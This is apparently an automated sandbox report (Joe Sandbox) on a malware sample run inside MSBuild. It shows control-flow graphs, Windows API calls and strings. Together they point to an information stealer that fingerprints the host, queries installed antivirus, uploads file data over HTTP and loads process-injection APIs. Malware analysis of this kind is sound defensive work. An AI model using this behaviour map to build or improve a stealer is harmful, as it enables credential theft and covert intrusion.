SetFilePointer 23117->23119 23117->23124 23120 41bda9 CreateFileA 23118->23120 23121 41bdde 23118->23121 23119->23124 23122 41bdc7 23120->23122 23123 41be02 CreateFileMappingA 23121->23123 23121->23124 23122->23124 23123->23124 23125 41be1e MapViewOfFile 23123->23125 23124->23114 23124->23115 23125->23124 23126 41be34 CloseHandle 23125->23126 23126->23124 23127->23111

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 994 411807-41186d call 42f229 CoInitializeEx CoInitializeSecurity CoCreateInstance 998 411971-411976 994->998 999 411873-4118a5 CoSetProxyBlanket 994->999 1000 41198a call 4104e7 998->1000 1004 4118ab-4118b6 999->1004 1005 41196a-41196f 999->1005 1003 41198f-411996 call 42f285 1000->1003 1007 411964-411985 1004->1007 1008 4118bc-4118d1 1004->1008 1005->1000 1007->1000 1008->1007 1012 4118d7-4118fc VariantInit call 411757 1008->1012 1015 411901-411962 FileTimeToSystemTime call 4104e7 VariantClear 1012->1015 1015->1003
                                                            APIs
                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                            • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                            • VariantInit.OLEAUT32(?), ref: 004118DB
                                                              • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                              • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
                                                              • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                              • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                            • VariantClear.OLEAUT32(?), ref: 0041195C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String$CreateFreeInitializeInstanceTimeVariant$AllocBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProxySecuritySystem_wtoi64
                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                            • API String ID: 2027821108-461178377
                                                            • Opcode ID: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
                                                            • Instruction ID: 99ef6883476e7e72b4c9cbd85dd5ecdaeb76e40d083b236b73c3eff291e47a74
                                                            • Opcode Fuzzy Hash: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
                                                            • Instruction Fuzzy Hash: 49416C71940209BBCB10DBD5DC89EEFBBBDEB89B11F20411AF611A6190D6799941CB38

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1021 41c585-41c5ab 1022 41c5b7-41c5bb 1021->1022 1023 41c5ad-41c5b2 1021->1023 1025 41c5c7-41c5cf 1022->1025 1026 41c5bd-41c5c2 1022->1026 1024 41cbb1-41cbbf call 41d12a 1023->1024 1027 41c5e1-41c5f8 lstrcpyA 1025->1027 1028 41c5d1-41c5d5 1025->1028 1026->1024 1032 41cbac 1027->1032 1033 41c5fe 1027->1033 1028->1027 1031 41c5d7 1028->1031 1031->1027 1032->1024 1034 41c604-41c607 1033->1034 1035 41c609 1034->1035 1036 41c60c-41c610 1034->1036 1035->1036 1036->1034 1037 41c612-41c624 1036->1037 1038 41c626-41c62c 1037->1038 1039 41c649 1037->1039 1041 41c62f-41c634 1038->1041 1040 41c650-41c661 1039->1040 1042 41c663-41c670 call 41b983 1040->1042 1043 41c672 1040->1043 1041->1041 1044 41c636-41c647 1041->1044 1042->1043 1046 41c678-41c67e 1042->1046 1043->1046 1044->1039 1044->1040 1048 41c680-41c68d call 41c05a 1046->1048 1049 41c68f-41c692 1046->1049 1058 41c6c7-41c6cb 1048->1058 1051 41c6a4-41c6a7 1049->1051 1052 41c694-41c6a2 call 41c0d9 1049->1052 1055 41c6b9-41c6bc 1051->1055 1056 41c6a9-41c6b7 call 41c1fc 1051->1056 1052->1058 1055->1032 1057 41c6c2 call 41c2bf 1055->1057 1056->1058 1057->1058 1058->1024 1063 41c6d1-41c70f lstrcpyA * 2 lstrlenA 1058->1063 1064 41c711-41c723 lstrcatA 1063->1064 1065 41c729-41c790 lstrcpyA 1063->1065 1064->1065 1066 41c792-41c799 1065->1066 1067 41c7a4-41c7c1 1065->1067 1066->1067 1068 41c79b-41c79d 1066->1068 1069 41c7c3-41c7c8 1067->1069 1070 41c7d8 1067->1070 1068->1067 1069->1070 1071 41c7ca-41c7d6 1069->1071 1072 41c7de-41c8ea call 41af66 1070->1072 1071->1072 1075 41c8fd-41c915 1072->1075 1076 41c8ec-41c8ee call 41c3ff 1072->1076 1078 41c917-41c921 call 41c3ff 1075->1078 1079 41c926-41c941 1075->1079 1080 41c8f3-41c8f8 1076->1080 1078->1024 1082 41c951-41c958 1079->1082 1083 41c943-41c947 1079->1083 1080->1024 1086 41c972 1082->1086 1087 41c95a-41c971 GetDesktopWindow GetTickCount srand 1082->1087 1083->1082 1085 41c949-41c94f call 41b902 1083->1085 1085->1082 1085->1083 1088 41c974-41c985 rand 1086->1088 1087->1086 1088->1088 1090 41c987-41c990 1088->1090 1092 41c993-41c9ac call 41b960 1090->1092 1095 41c9ae-41c9b2 1092->1095 1096 41c9b4-41c9bb 1095->1096 1097 41c9ce-41c9d6 1095->1097 1096->1097 1098 41c9bd-41c9ca call 41be93 1096->1098 1099 41c9e6 1097->1099 1100 41c9d8-41c9df 1097->1100 1098->1097 1103 41c9e8-41c9f8 1099->1103 1100->1099 1102 41c9e1-41c9e4 1100->1102 1102->1103 1105 41ca22 1103->1105 1106 41c9fa-41c9fd 1103->1106 1109 41ca28-41ca41 call 41c3ff 1105->1109 1107 41ca0f-41ca11 1106->1107 1108 41c9ff-41ca08 call 41c440 1106->1108 1107->1109 1111 41ca13-41ca15 call 41c52d 1107->1111 1113 41ca0d 1108->1113 1109->1024 1117 41ca47-41ca4d 1109->1117 1116 41ca1a-41ca20 1111->1116 1113->1116 1116->1109 1117->1080 1118 41ca53-41ca80 1117->1118 1119 41ca82-41ca85 1118->1119 1120 41cafd-41cb04 1118->1120 1123 41ca90-41ca9e 1119->1123 1124 41ca87-41ca8e 1119->1124 1121 41cb10-41cb12 1120->1121 1122 41cb06-41cb0b 1120->1122 1127 41cb14-41cb16 1121->1127 1128 41cb18-41cb27 call 41b1c8 1121->1128 1122->1024 1125 41caa0-41caa5 1123->1125 1126 41caac-41cacc call 41bf73 1123->1126 1124->1120 1124->1123 1125->1126 1134 41cad8-41cae7 call 41af66 1126->1134 1135 41cace-41cad3 1126->1135 1127->1122 1127->1128 1128->1080 1133 41cb2d-41cb38 1128->1133 1136 41cb3f-41cb44 1133->1136 1134->1080 1141 41caed-41caf9 call 41bf73 1134->1141 1135->1024 1136->1024 1138 41cb46-41cb8e malloc call 427170 malloc 1136->1138 1144 41cb90-41cb93 1138->1144 1145 41cb97-41cba0 1138->1145 1141->1136 1150 41cafb 1141->1150 1147 41cba8-41cbaa 1144->1147 1148 41cba2 1145->1148 1149 41cb95 1145->1149 1147->1024 1148->1147 1149->1145 1150->1135
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$UT
                                                            • API String ID: 0-1626504983
                                                            • Opcode ID: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
                                                            • Instruction ID: ceb82e4e54f3846e9f94eab9f0bc1a81f9160b51cd409ffa36bf36e6f1d1d03f
                                                            • Opcode Fuzzy Hash: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
                                                            • Instruction Fuzzy Hash: 55027EB19442688BDF21CF64CC817EEBBB5AF45304F1440EAD949AB242D6389EC5CF99

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2472 406963-4069e7 call 410519 call 404ab6 call 4104e7 InternetOpenA 2480 4069e9 2472->2480 2481 4069ea-4069f0 2472->2481 2480->2481 2482 4069f6-406a1c InternetConnectA 2481->2482 2483 406b6e-406b7a call 410519 2481->2483 2484 406b62 2482->2484 2485 406a22-406a5d 2482->2485 2487 406b7f-406baa call 402920 * 3 call 41d12a 2483->2487 2484->2483 2490 406a63-406a65 2485->2490 2491 406b56 2485->2491 2493 406a83-406ab4 HttpSendRequestA 2490->2493 2494 406a67-406a7c 2490->2494 2491->2484 2500 406ab6 2493->2500 2501 406acb-406adb call 411afd 2493->2501 2494->2493 2503 406abb-406ac6 call 4104e7 2500->2503 2509 406ae1-406ae3 2501->2509 2510 406bab-406bb0 2501->2510 2503->2487 2511 406ae5-406aea 2509->2511 2512 406b4a 2509->2512 2510->2503 2513 406b2b-406b48 InternetReadFile 2511->2513 2512->2491 2513->2512 2514 406aec-406af4 2513->2514 2514->2512 2515 406af6-406b26 call 410609 call 41058d call 402920 2514->2515 2515->2513
                                                            APIs
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00436997), ref: 004069C5
                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$ConnectCrackFileHttpOpenReadRequestSend
                                                            • String ID: ERROR$ERROR$GET$hhA
                                                            • API String ID: 2949174142-1019273260
                                                            • Opcode ID: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
                                                            • Instruction ID: b8be4e115d185e019c2f990b7d5ff4e2311a6bf9c79d427f1dbcd116f6077eb1
                                                            • Opcode Fuzzy Hash: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
                                                            • Instruction Fuzzy Hash: C551ADB1A00269AFDF20EB60DC84AEEB7B9FB04304F0180B6F549B2190DA755EC59F94
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1238713047-0
                                                            • Opcode ID: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
                                                            • Instruction ID: cecb0f06a50482290116f099c25e0230255ed02a1d9bcffe7551c72d2d14305d
                                                            • Opcode Fuzzy Hash: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
                                                            • Instruction Fuzzy Hash: 9C117771A00214ABDB11EB65DC85BEE73A9AB48304F400097F905A3251DB78AEC48B64
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                            • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocNameProcessUser
                                                            • String ID:
                                                            • API String ID: 1206570057-0
                                                            • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                            • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                            • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                            • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: /
                                                            • API String ID: 2299586839-4001269591
                                                            • Opcode ID: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
                                                            • Instruction ID: ba20de4f6d07cba688775156cda93bca6e715b227c052c7d3b8ee28496ea85f9
                                                            • Opcode Fuzzy Hash: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
                                                            • Instruction Fuzzy Hash: 2A314F71900328AFCB20EF65DD89BDEB3B8AB04304F5045EAF519A3152D7B86EC58F54
                                                            APIs
                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationTimeZone
                                                            • String ID:
                                                            • API String ID: 565725191-0
                                                            • Opcode ID: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
                                                            • Instruction ID: 61d95923a291ecda6e095beb314f014951f64f3de92a0ce4f4bd39d2e0bf5c47
                                                            • Opcode Fuzzy Hash: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
                                                            • Instruction Fuzzy Hash: F2F0E071A0132467EB04DFB4EC49B9B37659B04725F100295F511D71D0EB759E844785
                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
                                                            • Instruction ID: 6ece5ee49d11cdb060b7bdfc3a79890b10628a8e35908506f9dd9848dd200c5c
                                                            • Opcode Fuzzy Hash: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
                                                            • Instruction Fuzzy Hash: 63E092B1D1020DABCF04DF60EC459DE77FCEB08308F0054B5A505E3180D674AB888F44
                                                            APIs
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418654), ref: 004014DF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID:
                                                            • API String ID: 1586166983-0
                                                            • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                            • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                            • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                            • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d * 2 call 4104e7 * 4 21 405595 0->21 22 40559b-4055a1 0->22 21->22 23 4055a3-4055b8 22->23 24 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 22->24 23->24 28 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 23->28 24->28 93 4056d4-405712 HttpOpenRequestA 24->93 63 405eee-405f2e call 402920 * 6 call 41d12a 28->63 94 405e58 93->94 95 405718-40571e 93->95 94->28 96 405720-405735 95->96 97 40573c-405d65 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 427170 * 3 HttpSendRequestA 95->97 96->97 293 405d75-405d77 97->293 294 405db5-405dc5 call 411afd 293->294 295 405d79-405db0 call 4104e7 call 402920 * 3 293->295 301 405dcb-405dd0 294->301 302 405f2f 294->302 295->63 304 405e11-405e2e 301->304 309 405e30-405e43 304->309 310 405dd2-405dda 304->310 315 405e45 309->315 316 405e4c 309->316 310->309 312 405ddc-405e0c call 410609 call 41058d call 402920 310->312 312->304 315->316 316->94
                                                            APIs
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                            • _memmove.LIBCMT ref: 00405CB4
                                                            • _memmove.LIBCMT ref: 00405CD6
                                                            • _memmove.LIBCMT ref: 00405D05
                                                            • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memmove$HttpRequest$CrackInternetOpenSend
                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$af641acce3f8c85bf2490a9b3aa972c5$block$build_id$file_data
                                                            • API String ID: 4290584411-4131401294
                                                            • Opcode ID: 177d59b578fcbf7e257bc24f654d4a050c0cfce4b238dadea4729ba93ceee506
                                                            • Instruction ID: 4baf88cb2a5c47609fe6293a48fe3edcdf17a13d7b96339157f3ca2814525fa3
                                                            • Opcode Fuzzy Hash: 177d59b578fcbf7e257bc24f654d4a050c0cfce4b238dadea4729ba93ceee506
                                                            • Instruction Fuzzy Hash: 8F42E671D401699BDF21FB21DC45ADDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                            • wsprintfW.USER32 ref: 004016BC
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                            • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                            • _time64.MSVCRT ref: 0040170E
                                                            • srand.MSVCRT ref: 00401715
                                                            • rand.MSVCRT ref: 0040171E
                                                            • _memset.LIBCMT ref: 0040172E
                                                            • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                            • _memset.LIBCMT ref: 00401763
                                                            • CloseHandle.KERNEL32(?), ref: 00401771
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                            • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                            • _memset.LIBCMT ref: 004017BE
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                            • CloseHandle.KERNEL32(?), ref: 004017DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                            • String ID: %s%s$delays.tmp
                                                            • API String ID: 1620473967-1413376734
                                                            • Opcode ID: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
                                                            • Instruction ID: 9b5f552432b4e98a6f0c5797751fefc193ccc8af765751ef1568987e4d70ee72
                                                            • Opcode Fuzzy Hash: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
                                                            • Instruction Fuzzy Hash: B641C6B1D00218ABDB205F61AC4CF9F7B7DEB85715F1016BAF00AE10A1DA394E54CF28

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 850 418a63-418a6a 851 418a70-418edd 850->851 852 418ee2-418f81 LoadLibraryA * 6 850->852 851->852 859 418ff1-418ff8 852->859 860 418f83-418fec 852->860 862 4190b1-4190b8 859->862 863 418ffe-4190ac 859->863 860->859 864 419128-41912f 862->864 865 4190ba-419123 862->865 863->862 867 419135-4191b5 864->867 868 4191ba-4191c1 864->868 865->864 867->868 871 419291-419298 868->871 872 4191c7-41928c 868->872 875 419308-41930f 871->875 876 41929a-419303 871->876 872->871 881 419311-419335 875->881 882 41933a-419341 875->882 876->875 881->882 885 419343-419367 882->885 886 41936c-419373 882->886 885->886 894 419379-419453 886->894 895 419458-41945f 886->895 894->895 897 419461-4194b3 895->897 898 4194b8-4194bf 895->898 897->898 909 4194c1-4194ce 898->909 910 4194d3-4194da 898->910 909->910 912 419533-41953a 910->912 913 4194dc-41952e 910->913 923 41954d 912->923 924 41953c-419548 912->924 913->912 924->923
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                            • API String ID: 1029625771-2740034357
                                                            • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                            • Instruction ID: 8ba0d5c8ae2e13c06544b1593b83c2cece409b0c910b42dbc8887f4207037caa
                                                            • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                            • Instruction Fuzzy Hash: C752F475910312AFEF1ADFA0FD088243BA7F718707F11A466E91582270E73B4A64EF19

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1151 411997-4119fb call 42f1bd CoInitializeEx CoInitializeSecurity CoCreateInstance 1155 411a01-411a2d CoSetProxyBlanket 1151->1155 1156 411aa0-411aa5 1151->1156 1158 411a31-411a33 1155->1158 1157 411ab9 call 4104e7 1156->1157 1162 411abe-411ac5 call 42f262 1157->1162 1160 411a35-411a40 1158->1160 1161 411a99-411a9e 1158->1161 1163 411a93-411ab4 1160->1163 1164 411a42-411a57 1160->1164 1161->1157 1163->1157 1164->1163 1169 411a59-411a91 VariantInit call 411d42 call 4104e7 VariantClear 1164->1169 1169->1162
                                                            APIs
                                                            • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                            • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                            • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                            • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeVariant$BlanketClearCreateH_prolog3_catchInitInstanceProxySecurity
                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                            • API String ID: 3060130021-315474579
                                                            • Opcode ID: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
                                                            • Instruction ID: a052c58cf411f7e98e6331d271807bd97e667b65bf600afed1fc3e3d3cff73f9
                                                            • Opcode Fuzzy Hash: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
                                                            • Instruction Fuzzy Hash: 90314F70A04245BBCB20DB91DC49EEFBF7CEFC9B10F20465AF611A61A0C6B85941CB68

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
